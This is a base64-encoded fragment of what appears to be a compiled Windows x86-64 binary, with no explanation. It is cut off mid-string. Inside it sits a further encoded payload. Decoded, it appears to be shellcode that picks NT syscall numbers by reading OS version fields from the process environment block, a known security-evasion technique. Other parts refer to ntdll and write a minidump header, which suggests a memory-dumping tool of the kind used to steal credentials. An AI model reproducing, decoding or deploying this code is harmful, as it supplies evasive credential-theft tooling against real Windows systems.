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kP8lmqMAAJCQ/yWKowAAkJD/JXqjAACQkP8laqMAAJCQ/yVaowAAkJBVU0iD7DhIjawkgAAAAEiJTdBIiVXYTIlF4EyJTehIjUXYSIlFoEiLXaC5AQAAAEiLBepQAAD/0EmJ2EiLVdBIicHoian//4lFrItFrEiDxDhbXcOQkJCQkJCQkJCQkJDp25X//5CQkJCQkJCQkJCQ//////////9Af0AAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFYwaUo1MGlENVBCSWcrd2c2TDhzQUFCSWlmeGZ3Mll1RHgrRUFBQUFBQUREWmk0UEg0UUFBQUFBQUE4ZlJBQUFaVWlMQkNWZ0FBQUFnN2dZQVFBQUJuUU9nN2dZQVFBQUNuUlE2VDhCQUFDRHVCd0JBQUFCZEIrRHVCd0JBQUFDRDRUT0FBQUFnN2djQVFBQUF3K0V5QUFBQU9rWEFRQUFab0c0SUFFQUFMQWRENFNmQUFBQVpvRzRJQUVBQUxFZEQ0U1hBQUFBNmZRQUFBQm1nYmdnQVFBQUFDZ1BoSmdBQUFCbWdiZ2dBUUFBV2lr
UGhKQUFBQUJtZ2JnZ0FRQUFPVGdQaElnQUFBQm1nYmdnQVFBQTF6b1BoSUFBQUFCbWdiZ2dBUUFBcXo5MGZHYUJ1Q0FCQUFEdVFuUjRab0c0SUFFQUFHTkZkSFJtZ2JnZ0FRQUF1a2QwY0dhQnVDQUJBQUM3UjNSc1pvRzRJQUVBQUdGS2RHaG1nYmdnQVFBQVlrcDBaT3RwdUQ0QUFBRHJZN2crQUFBQTYxeTRQd0FBQU90VnVFQUFBQURyVHJoQkFBQUE2MGU0UVFBQUFPdEF1RUVBQUFEck9iaEJBQUFBNnpLNFFRQUFBT3NydUVFQUFBRHJKTGhCQUFBQTZ4MjRRUUFBQU9zV3VFRUFBQURyRDdoQkFBQUE2d2k0UVFBQUFPc0J3MG1KeWc4RncyVklpd1FsWUFBQUFJTzRHQUVBQUFaMERvTzRHQUVBQUFwMFVPay9BUUFBZzdnY0FRQUFBWFFmZzdnY0FRQUFBZytFemdBQUFJTzRIQUVBQUFNUGhNZ0FBQURwRndFQUFHYUJ1Q0FCQUFDd0hRK0Vud0FBQUdhQnVDQUJBQUN4SFErRWx3QUFBT24wQUFBQVpvRzRJQUVBQUFBb0Q0U1lBQUFBWm9HNElBRUFBRm9wRDRTUUFBQUFab0c0SUFFQUFEazRENFNJQUFBQVpvRzRJQUVBQU5jNkQ0U0FBQUFBWm9HNElBRUFBS3MvZEh4bWdiZ2dBUUFBN2tKMGVHYUJ1Q0FCQUFCalJYUjBab0c0SUFFQUFMcEhkSEJtZ2JnZ0FRQUF1MGQwYkdhQnVDQUJBQUJoU25Sb1pvRzRJQUVBQUdKS2RHVHJhYmc1QUFBQTYyTzRPUUFBQU90Y3VEb0FBQURyVmJnN0FBQUE2MDY0UEFBQUFPdEh1RHdBQUFEclFMZzhBQUFBNnptNFBBQUFBT3N5dUR3QUFBRHJLN2c4QUFBQTZ5UzRQQUFBQU9zZHVEd0FBQURyRnJnOEFBQUE2dys0UEFBQUFPc0l1RHdBQUFEckFjTkppY29QQmNObFNJc0VKV0FBQUFDRHVCZ0JBQUFHZEE2RHVCZ0JBQUFLZEZEcFB3RUFBSU80SEFFQUFBRjBINE80SEFFQUFBSVBoTTRBQUFDRHVCd0JBQUFERDRUSUFBQUE2UmNCQUFCbWdiZ2dBUUFBc0IwUGhKOEFBQUJtZ2JnZ0FRQUFzUjBQaEpjQUFBRHA5QUFBQUdhQnVDQUJBQUFBS0ErRW1BQUFBR2FCdUNBQkFBQmFLUStFa0FBQUFHYUJ1Q0FCQUFBNU9BK0VpQUFBQUdhQnVDQUJBQURYT2crRWdBQUFBR2FCdUNBQkFBQ3JQM1I4Wm9HNElBRUFBTzVDZEhobWdiZ2dBUUFBWTBWMGRHYUJ1Q0FCQUFDNlIzUndab0c0SUFFQUFMdEhkR3htZ2JnZ0FRQUFZVXAwYUdhQnVDQUJBQUJpU25SazYybTRQd0FBQU90anVEOEFBQURyWExoQUFBQUE2MVc0UVFBQUFPdE91RUlBQUFEclI3aENBQUFBNjBDNFFnQUFBT3M1dUVJQUFBRHJNcmhDQUFBQTZ5dTRRZ0FBQU9za3VFSUFBQURySGJoQ0FBQUE2eGE0UWdBQUFPc1B1RUlBQUFEckNMaENBQUFBNndIRFNZbktEd1hEWlVpTEJDVmdBQUFBZzdnWUFRQUFCblFPZzdnWUFRQUFDblJRNlQ4QkFBQ0R1QndCQUFBQmRCK0R1QndCQUFBQ0Q0VE9BQUFBZzdnY0FRQUFBdytFeUFBQUFPa1hBUUFBWm9HNElBRUFBTEFkRDRTZkFBQUFab0c0SUFFQUFMRWRENFNYQUFBQTZmUUFBQUJtZ2JnZ0FRQUFBQ2dQaEpnQUFBQm1nYmdnQVFBQVdpa1BoSkFBQUFCbWdiZ2dBUUFBT1RnUGhJZ0FBQUJtZ2JnZ0FRQUExem9QaElBQUFBQm1nYmdnQVFBQXF6OTBmR2FCdUNB
QkFBRHVRblI0Wm9HNElBRUFBR05GZEhSbWdiZ2dBUUFBdWtkMGNHYUJ1Q0FCQUFDN1IzUnNab0c0SUFFQUFHRktkR2htZ2JnZ0FRQUFZa3AwWk90cHVDTUFBQURyWTdnakFBQUE2MXk0SkFBQUFPdFZ1Q1VBQUFEclRyZ21BQUFBNjBlNEpnQUFBT3RBdUNZQUFBRHJPYmdtQUFBQTZ6SzRKZ0FBQU9zcnVDWUFBQURySkxnbUFBQUE2eDI0SmdBQUFPc1d1Q1lBQUFEckQ3Z21BQUFBNndpNEpnQUFBT3NCdzBtSnlnOEZ3MlZJaXdRbFlBQUFBSU80R0FFQUFBWjBEb080R0FFQUFBcDBVT2svQVFBQWc3Z2NBUUFBQVhRZmc3Z2NBUUFBQWcrRXpnQUFBSU80SEFFQUFBTVBoTWdBQUFEcEZ3RUFBR2FCdUNBQkFBQ3dIUStFbndBQUFHYUJ1Q0FCQUFDeEhRK0Vsd0FBQU9uMEFBQUFab0c0SUFFQUFBQW9ENFNZQUFBQVpvRzRJQUVBQUZvcEQ0U1FBQUFBWm9HNElBRUFBRGs0RDRTSUFBQUFab0c0SUFFQUFOYzZENFNBQUFBQVpvRzRJQUVBQUtzL2RIeG1nYmdnQVFBQTdrSjBlR2FCdUNBQkFBQmpSWFIwWm9HNElBRUFBTHBIZEhCbWdiZ2dBUUFBdTBkMGJHYUJ1Q0FCQUFCaFNuUm9ab0c0SUFFQUFHSktkR1RyYWJqNUFBQUE2Mk80K1FBQUFPdGN1QXNCQUFEclZiZ09BUUFBNjA2NEZBRUFBT3RIdUJjQkFBRHJRTGdaQVFBQTZ6bTRIUUVBQU9zeXVCOEJBQURySzdnaEFRQUE2eVM0SWdFQUFPc2R1Q01CQUFEckZyZ2pBUUFBNncrNEtBRUFBT3NJdUNnQkFBRHJBY05KaWNvUEJjTmxTSXNFSldBQUFBQ0R1QmdCQUFBR2RBNkR1QmdCQUFBS2RGRHBQd0VBQUlPNEhBRUFBQUYwSDRPNEhBRUFBQUlQaE00QUFBQ0R1QndCQUFBREQ0VElBQUFBNlJjQkFBQm1nYmdnQVFBQXNCMFBoSjhBQUFCbWdiZ2dBUUFBc1IwUGhKY0FBQURwOUFBQUFHYUJ1Q0FCQUFBQUtBK0VtQUFBQUdhQnVDQUJBQUJhS1ErRWtBQUFBR2FCdUNBQkFBQTVPQStFaUFBQUFHYUJ1Q0FCQUFEWE9nK0VnQUFBQUdhQnVDQUJBQUNyUDNSOFpvRzRJQUVBQU81Q2RIaG1nYmdnQVFBQVkwVjBkR2FCdUNBQkFBQzZSM1J3Wm9HNElBRUFBTHRIZEd4bWdiZ2dBUUFBWVVwMGFHYUJ1Q0FCQUFCaVNuUms2Mm00SGdBQUFPdGp1QjRBQUFEclhMZ2ZBQUFBNjFXNElBQUFBT3RPdUNFQUFBRHJSN2doQUFBQTYwQzRJUUFBQU9zNXVDRUFBQURyTXJnaEFBQUE2eXU0SVFBQUFPc2t1Q0VBQUFEckhiZ2hBQUFBNnhhNElRQUFBT3NQdUNFQUFBRHJDTGdoQUFBQTZ3SERTWW5LRHdYRFpVaUxCQ1ZnQUFBQWc3Z1lBUUFBQm5RT2c3Z1lBUUFBQ25SUTZUOEJBQUNEdUJ3QkFBQUJkQitEdUJ3QkFBQUNENFRPQUFBQWc3Z2NBUUFBQXcrRXlBQUFBT2tYQVFBQVpvRzRJQUVBQUxBZEQ0U2ZBQUFBWm9HNElBRUFBTEVkRDRTWEFBQUE2ZlFBQUFCbWdiZ2dBUUFBQUNnUGhKZ0FBQUJtZ2JnZ0FRQUFXaWtQaEpBQUFBQm1nYmdnQVFBQU9UZ1BoSWdBQUFCbWdiZ2dBUUFBMXpvUGhJQUFBQUJtZ2JnZ0FRQUFxejkwZkdhQnVDQUJBQUR1UW5SNFpvRzRJQUVBQUdORmRIUm1nYmdnQVFBQXVrZDBjR2FCdUNBQkFBQzdSM1JzWm9HNElBRUFBR0ZLZEdo
bWdiZ2dBUUFBWWtwMFpPdHB1QTBBQUFEclk3Z05BQUFBNjF5NERnQUFBT3RWdUE4QUFBRHJUcmdRQUFBQTYwZTRFQUFBQU90QXVCQUFBQURyT2JnUUFBQUE2eks0RUFBQUFPc3J1QkFBQUFEckpMZ1FBQUFBNngyNEVBQUFBT3NXdUJBQUFBRHJEN2dRQUFBQTZ3aTRFQUFBQU9zQncwbUp5ZzhGdzJWSWl3UWxZQUFBQUlPNEdBRUFBQVowRG9PNEdBRUFBQXAwVU9rL0FRQUFnN2djQVFBQUFYUWZnN2djQVFBQUFnK0V6Z0FBQUlPNEhBRUFBQU1QaE1nQUFBRHBGd0VBQUdhQnVDQUJBQUN3SFErRW53QUFBR2FCdUNBQkFBQ3hIUStFbHdBQUFPbjBBQUFBWm9HNElBRUFBQUFvRDRTWUFBQUFab0c0SUFFQUFGb3BENFNRQUFBQVpvRzRJQUVBQURrNEQ0U0lBQUFBWm9HNElBRUFBTmM2RDRTQUFBQUFab0c0SUFFQUFLcy9kSHhtZ2JnZ0FRQUE3a0owZUdhQnVDQUJBQUJqUlhSMFpvRzRJQUVBQUxwSGRIQm1nYmdnQVFBQXUwZDBiR2FCdUNBQkFBQmhTblJvWm9HNElBRUFBR0pLZEdUcmFiZ3pBQUFBNjJPNE13QUFBT3RjdURRQUFBRHJWYmcxQUFBQTYwNjROZ0FBQU90SHVEWUFBQURyUUxnMkFBQUE2em00TmdBQUFPc3l1RFlBQUFEcks3ZzJBQUFBNnlTNE5nQUFBT3NkdURZQUFBRHJGcmcyQUFBQTZ3KzROZ0FBQU9zSXVEWUFBQURyQWNOSmljb1BCY05sU0lzRUpXQUFBQUNEdUJnQkFBQUdkQTZEdUJnQkFBQUtkRkRwUHdFQUFJTzRIQUVBQUFGMEg0TzRIQUVBQUFJUGhNNEFBQUNEdUJ3QkFBQURENFRJQUFBQTZSY0JBQUJtZ2JnZ0FRQUFzQjBQaEo4QUFBQm1nYmdnQVFBQXNSMFBoSmNBQUFEcDlBQUFBR2FCdUNBQkFBQUFLQStFbUFBQUFHYUJ1Q0FCQUFCYUtRK0VrQUFBQUdhQnVDQUJBQUE1T0ErRWlBQUFBR2FCdUNBQkFBRFhPZytFZ0FBQUFHYUJ1Q0FCQUFDclAzUjhab0c0SUFFQUFPNUNkSGhtZ2JnZ0FRQUFZMFYwZEdhQnVDQUJBQUM2UjNSd1pvRzRJQUVBQUx0SGRHeG1nYmdnQVFBQVlVcDBhR2FCdUNBQkFBQmlTblJrNjJtNFBBQUFBT3RqdUR3QUFBRHJYTGc5QUFBQTYxVzRQZ0FBQU90T3VEOEFBQURyUjdnL0FBQUE2MEM0UHdBQUFPczV1RDhBQUFEck1yZy9BQUFBNnl1NFB3QUFBT3NrdUQ4QUFBRHJIYmcvQUFBQTZ4YTRQd0FBQU9zUHVEOEFBQURyQ0xnL0FBQUE2d0hEU1luS0R3WERaaTRQSDRRQUFBQUFBRUZYUVZaQlZVRlVWVmUvQUJBQUFGWk1pYzVUU0lIc0dBWUFBRW1MbVlBQUFBQk1pWVFrMkFFQUFJbVVKSmdCQUFCSWlZd2tvQUVBQUVqSGhDU1lBQUFBQUFBQUFNZUVKS0FBQUFBQUFBQUFTTWVFSkxBQkFBQUFBQUFBeDRRa3VBRUFBQUFBQUFCSXg0UWt3QUVBQUFBQUFBQkl4NFFreUFFQUFBQUFBQURIaENUUUFRQUFJZ2dBQUVqSGhDVG9BUUFBQUFBQUFFakhoQ1R3QVFBQUFBQUFBRWpIaENUNEFRQUFBQUFBQUVqSGhDUUFBZ0FBQUFBQUFNZUVKT0FCQUFBQUFBQUFRZitSaUFBQUFFRzRBQkFBQURIU1NJbkIvOU5JaWNOSWhjQjFOK25EQ2dBQVppNFBINFFBQUFBQUFFaUxycGdBQUFBQi8vK1dpQUFBQUVtSjJFR0orVEhTU0luQi85VklpY05JaGNB
UGhKRUtBQUJGTWNsQmlmaElpZHE1QlFBQUFPai8rLy8vUFFRQUFNQjB2b1hBRDRWWUNnQUFpNHdrbUFFQUFFaUoyamxMVUErRlB3b0FBSXQ2QkVpTHJvQUFBQUNKdkNTNEFRQUEvNWFJQUFBQVRJMEVmekhTU0luQlNjSGdBdi9WU0ltRUpMQUJBQUJJaGNBUGhBNEtBQUJJaTc2UUFBQUFTSTJzSkJBQ0FBQk1qYXdrOEFBQUFQK1dpQUFBQUVtSjJESFNUSTJrSkxBQUFBQklpY0c3QVFBQUFQL1hTSTJNSkpBQkFBQklpZkpJamJ3a2hBQUFBT2dBRlFBQWk1UWs0QUVBQUVVeHlVVXh3RWk0VFVSTlVKT25BQUJJaTR3azJBRUFBTWVFSk9BQUFBQUFBQUFBU0ltRUpOQUFBQUJJdUFRQUFBQWdBQUFBU0ltRUpOZ0FBQUJJeDRRazZBQUFBQ0lJQUFEL2xxQUFBQUJJaVhRa0lFbUo2VWlMakNUWUFRQUFRYmdnQUFBQVNJMlVKTkFBQUFEb1p3c0FBSXVFSk9BQkFBQk1pZW5IaENTa0FBQUFCd0FBQUlQQVVJbUVKT0FCQUFDSmhDU3NBQUFBLzVhd0FBQUF1bXdBQUFCSXVHNTBaR3hzTG1Sc3VYSnpBQUJJaVlRa2pBQUFBRWk0VW5Sc1IyVjBUblJtaVpRa2xBQUFBRWk2Vm1WeWMybHZiazVJaVlRa3NBQUFBRWlOaENTTUFBQUFTSW1VSkxnQUFBQm1pWXdreEFBQUFFaUp3Y2VFSk1BQUFBQjFiV0pseG9Ra3hnQUFBQUJJaVVRa1VQK1dxQUFBQUV5SjRrbUp4a2lKd2YrVzBBQUFBRWlKK2tpSmZDUm9USTJFSklnQUFBQk1pVVFrTUVpTmpDU0FBQUFBLzlCTWlmRkZNZmFCcENTSUFBQUEvLzhBQVArV3VBQUFBQSszaENUd0FBQUF4b1FrSndFQUFBSEhoQ1EwQVFBQUFnQUFBR2FKaENRZ0FRQUFpNFFrSEFFQUFNZUVKRHdCQUFBUUFBQUFpWVFrSWdFQUFJdUVKQkFCQUFCSXg0UWtRQUVBQUFBQUFBQ0loQ1FtQVFBQWk0UWtnQUFBQUVqSGhDUklBUUFBQUFBQUFJbUVKQ2dCQUFDTGhDU0VBQUFBaVlRa0xBRUFBSXVFSklnQUFBQ0poQ1F3QVFBQWk0UWs0QUVBQUlQQU9JbUVKRGdCQUFCRWlmSC9sc0FBQUFDRndIUVJTSW5ZUklueFNOUGdTQW1FSkVBQkFBQkJnOFlCUVlQK1FIWFlpNVFrNEFFQUFFVXh5VVV4d0VpSjcwaUxqQ1RZQVFBQVNJMWNKSGovbHFBQUFBQklpWFFrSUVtSjZVaU5oQ1FnQVFBQVNJdU1KTmdCQUFCSWljSkJ1RGdBQUFCSWlVUWtRT2hxQ1FBQU1jQzVRQUFBQUlPRUpPQUJBQUE0ODBpclNJbnAvNWJJQUFBQVNJbDBKQ0JJalZRa2ZFaUxqQ1RZQVFBQUFjQkppZGxCdUFRQUFBQ0pSQ1I4NkNrSkFBQklpWFFrSUVtSjJVaUo2a1NMUkNSOFNJdU1KTmdCQUFEb0RBa0FBSXRFSkh4Rk1jbEZNY0FEaENUZ0FRQUFpNVFrM0FBQUFNZUVKS2dBQUFBNEFBQUFnOEFFU0l1TUpOZ0JBQUNKaENUZ0FRQUEvNWFnQUFBQVNJbDBKQ0JKaWVsSWpZUWtwQUFBQUVpTGpDVFlBUUFBU0luQ1FiZ01BQUFBU0lsRUpFam9wZ2dBQUl1RUpPQUJBQUNMakNUSUFRQUF4NFFrcEFBQUFBUUFBQUNKUkNSZ2lZUWtyQUFBQUlYSkQ0UlVDQUFBZytrQlNJdVVKTUFCQUFCSWFja29BZ0FBU0luUVRJMkVDaWdDQUFBeHlROGZBSU00QVlQUkFFZ0ZLQUlBQUV3NXdIWHZhOGxzUlRIMlRJbGtKRmhNamJ3
a0ZBSUFBTWVFSklRQUFBQUFBQUFBUlluMGpVRUVpMHdrWUluSGlVUWtaSW5JQWZoSWpid2tPQUVBQUltRUpPQUJBQUNOUVFTSlJDUTg2dzBQSDBRQUFFaUxsQ1RBQVFBQVJJbmpTR25iS0FJQUFFaU5EQnFMQVlYQUQ0VWhBZ0FBU0lQQkhQK1d5QUFBQUVpTGxDVEFBUUFBVEluNWpVUUFBa2dCMm9tRUpCQUNBQUJJZzhJYy81WUFBUUFBaTVRazRBRUFBRVV4eVVVeHdFZ0RuQ1RBQVFBQVNJdU1KTmdCQUFCSWkwTUlTSW1FSkNBQkFBQ0xReENKaENRb0FRQUFpME1ZaVlRa0xBRUFBSXRERkl1Y0pCQUNBQUNKbENRMEFRQUFpWVFrTUFFQUFJMUQvb1BEQkltRUpCQUNBQUQvbHFBQUFBQkJpZGhOaWVsSWllcElpWFFrSUVpTGpDVFlBUUFBNkNnSEFBQUJuQ1RnQVFBQVRJbjVTSXRVSkRESGhDU3dBQUFBWEFBQUFFakhCd0FBQUFCSXgwY0lBQUFBQUVqSFJ4QUFBQUFBU01kSEdBQUFBQUJJeDBjZ0FBQUFBRWpIUnlnQUFBQUF4MGN3QUFBQUFQK1c2QUFBQUluRGhjQVBoSklBQUFCTWk3YUFBQUFBLzVhSUFBQUFRWW5ZTWRKSWljRkIvOVpKaWNaSWhjQjBjb3VVSklnQUFBQkppY0ZCaWRoTWlmbi9sdkFBQUFDRndIUkJUSXRNSkZCSWkxUWtXRTJKNkV5SjhmK1crQUFBQUlYQWRDZUR2Q1NNQUFBQU5FRzROQUFBQUVpTGxDVHdBQUFBU0luNVJBOUdoQ1NNQUFBQVJZbkEveFpJaTU2UUFBQUEvNWFJQUFBQVRZbndNZEpJaWNILzA0dUVKSVFBQUFDTFRDUThSVEhKUlRIQVNNZUVKR3dCQUFBQUFBQUFTTWVFSkhRQkFBQUFBQUFBalZBQmE4QnNpWlFraEFBQUFFakhoQ1I4QVFBQUFBQUFBRWpIaENTRUFRQUFBQUFBQUkwVUNFaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrUUUySjZVaUxqQ1RZQVFBQVFiaHNBQUFBNkxjRkFBQkJnOFFCUkR1a0pNZ0JBQUFQZ3EzOS8vOU1pMlFrV0l0VUpHQkZNY2xGTWNBeDIwaUxqQ1RZQVFBQS81YWdBQUFBU0lsMEpDQklpMVFrYUUySjZVaUxqQ1RZQVFBQVFiZ0VBQUFBNkdZRkFBQ0xSQ1JrUlRISlJUSEFTSXVNSk5nQkFBQ0poQ1NvQUFBQWk0UWszQUFBQUkxUURQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9nZEJRQUE2eGNQSHdCTUFmTVBndk1BQUFCSWk1d2tFQUlBQUV3QjgwaUxqQ1NnQVFBQVFia3dBQUFBU1lub1NJbmEvNWJZQUFBQVNJWEFENFRGQUFBQWdid2tNQUlBQUFBUUFBQk1pN1FrS0FJQUFIVzBUSXU4SlBnQkFBQklpN3drRUFJQUFFMkYvdytFT2dRQUFJdUVKQUFDQUFDTGxDUUVBZ0FBT2RBUGdod0VBQUJNaTVhWUFBQUFBZEtKbENRRUFnQUFpVlFrUEV5SlZDUXcvNWFJQUFBQVJJdE1KRHhOaWZneDBreUxWQ1F3U0luQlNjSGhCRUgvMGttSngwaUpoQ1Q0QVFBQVRZWC9ENFFTQkFBQWk0UWtBQUlBQUVpTGpDUW9BZ0FBaWNLRHdBRkl3ZUlFU1FIWFRZbDNDRW1Kemt3QjgwbUpQNG1FSkFBQ0FBQVBndzMvLy8rTGhDUUFBZ0FBaTVRazRBRUFBRVV4eVVVeHdNZUVKS1FBQUFBSkFBQUFqVWdCU0ltRUpQQUFBQUNKejRtVUpLd0FBQUJJaTR3azJBRUFBTUhuQkkwRU9vbDhKR0JJaVlR
aytBQUFBUCtXb0FBQUFFaUpkQ1FnVElucVNZbnBTSXVNSk5nQkFBQkJ1QWdBQUFCRk1lM29xQU1BQUl1RUpPQUJBQUJGTWNsRk1jQklpNHdrMkFFQUFJMVFDSW1VSk9BQkFBRC9scUFBQUFCSWlYUWtJRW1KNlVpTGpDVFlBUUFBU0kyVUpQZ0FBQUJCdUFnQUFBRG9ZQU1BQUl1RUpPQUJBQUNOZUFpTGhDUUFBZ0FBaVh3a1BFR0p4a0hCNWdSQkFmNUVpYlFrNEFFQUFJWEFENFNnQVFBQVJJbHNKREJJaTN3a1VBOGZnQUFBQUFCRWkzd2tNRVV4eVVVeHdFVXg3VWlMaENUNEFRQUFTSXVNSk5nQkFBQkp3ZWNFVEFINFNJc1FTSXRBQ0VpSmxDUWdBUUFBVElueVNJbUVKQ2dCQUFEL2x1QUFBQUJJaTRRaytBRUFBRXdCK0VpTFdBaEloZHQxSnVuU0FBQUFacEJJaTRRaytBRUFBRW1CeFFBRUFBQk1BZmhJaTFnSVREbnJENGF4QUFBQVNZblpSQ25yVFNucFNZSDUvd01BQUhZTFFia0FCQUFBdXdBRUFBQklpeEJNaVdRa0lFbUo2RWlMakNTZ0FRQUFTTWVFSkxBQUFBQUFBQUFBVEFIcTZEM3ovLytGd0hXWlNJbDBKQ0JKaWZsQmlkaElpZXBJaTR3azJBRUFBT2crQWdBQTZYbi8vLzltRHgrRUFBQUFBQUJJQWNJNVNsQVBoTUgxLy8rTEFvWEFkZTVJaTc2UUFBQUEvNWFJQUFBQVNZbllNZEpJaWNILzF6SEFTSUhFR0FZQUFGdGVYMTFCWEVGZFFWNUJYOE9RaTF3a1BFaUxqQ1RZQVFBQVJUSEpSVEhBVEFPMEpDZ0JBQUNKMm9QREVQK1dvQUFBQUVpSmRDUWdTSXRVSkVCTmllRklpNHdrMkFFQUFFRzRFQUFBQU9pckFRQUFnMFFrTUFHTFJDUXdpVndrUER1RUpBQUNBQUFQZ25IKy8vK0xSQ1JnU0l1TUpOZ0JBQUJGTWNsRk1jQ0poQ1NvQUFBQWk0UWszQUFBQUkxUUdQK1dvQUFBQUVpSmRDUWdTSXRVSkVoSmllbElpNHdrMkFFQUFFRzREQUFBQU9oSUFRQUFpNFFrM0FBQUFFVXh5VVV4d0VpTGpDVFlBUUFBalZBay81YWdBQUFBU0lsMEpDQklpNHdrMkFFQUFFbUo2VWlObENTWUFBQUFRYmdNQUFBQTZBY0JBQUJJaTd3azZBRUFBRWlMbnBBQUFBRC9sb2dBQUFBeDBrbUorRWlKd2YvVFNJdTh